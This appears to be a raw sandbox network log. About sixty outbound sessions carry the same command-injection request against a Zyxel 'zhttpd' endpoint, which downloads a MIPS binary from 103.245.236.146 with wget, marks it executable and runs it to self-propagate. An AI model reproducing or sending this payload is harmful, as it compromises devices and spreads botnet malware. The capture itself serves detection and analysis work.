                                                Jan 28, 2024 10:16:13.631612062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1305192.168.2.2339896183.202.25.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631664038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1306192.168.2.236013835.61.207.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631666899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1307192.168.2.235972072.39.134.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631686926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1308192.168.2.2344776213.199.114.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631722927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1309192.168.2.2353920206.60.83.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631726027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1310192.168.2.234316634.36.85.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631777048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1311192.168.2.2332794145.213.247.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631798029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1312192.168.2.2340784183.246.177.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631808996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1313192.168.2.233345234.210.96.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631844997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1314192.168.2.2336496115.204.151.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631867886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1315192.168.2.234574223.95.228.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631902933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1316192.168.2.2343682201.148.207.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631931067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1317192.168.2.2353640150.185.102.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631942987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1318192.168.2.233905837.253.6.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631980896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1319192.168.2.2341386149.86.192.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632005930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1320192.168.2.2355728107.15.88.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632029057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1321192.168.2.234785081.83.105.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632060051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1322192.168.2.235540217.179.227.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632100105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1323192.168.2.23494024.158.61.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632116079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1324192.168.2.235485895.254.132.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632132053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1325192.168.2.235106086.232.120.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632154942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1326192.168.2.235885896.126.135.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632169962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1327192.168.2.2354210203.164.21.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632219076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1328192.168.2.235317474.54.41.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632246971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1329192.168.2.234536898.253.224.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632287025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1330192.168.2.235800480.225.131.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632318020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1331192.168.2.235481462.249.130.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632339001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1332192.168.2.2351190181.108.197.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632378101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1333192.168.2.235515053.21.252.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632416010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1334192.168.2.234732289.72.129.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632445097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1335192.168.2.2342564123.35.62.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632462978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1336192.168.2.2339268100.58.122.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632493973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1337192.168.2.2336262177.218.111.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632514000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1338192.168.2.2348586222.193.48.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632549047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1339192.168.2.2342390222.144.182.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632567883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1340192.168.2.23372189.32.158.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632597923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1341192.168.2.234867685.209.166.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632596970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1342192.168.2.235026450.219.172.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632611036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1343192.168.2.234275431.68.70.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632652044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1344192.168.2.2340758194.109.202.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632682085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1345192.168.2.23511361.5.227.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632733107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1346192.168.2.2343958179.79.186.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632747889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1347192.168.2.2341922191.87.172.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632786989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1348192.168.2.2357248118.204.36.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632788897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1349192.168.2.2344404175.132.195.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632832050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1350192.168.2.234129497.50.150.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632863998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1351192.168.2.2346028179.43.5.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632874012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1352192.168.2.2345450197.71.159.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632932901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1353192.168.2.2350538221.61.167.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632941008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1354192.168.2.2354990179.202.84.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.632972956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1355192.168.2.233689053.222.241.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633008957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1356192.168.2.23574821.40.202.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633033037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1357192.168.2.2339826184.90.226.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633055925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1358192.168.2.2353278176.102.161.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633090019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1359192.168.2.233916025.249.95.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633105040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1360192.168.2.2353826165.77.219.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633115053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1361192.168.2.233445642.197.202.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633157969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1362192.168.2.233399640.113.80.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633188963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1363192.168.2.2335148188.12.36.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633188963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1364192.168.2.2358226147.177.154.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633208036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1365192.168.2.234975681.192.80.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633263111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1366192.168.2.2356418107.111.151.175443
                                                TimestampBytes transferredDirectionData
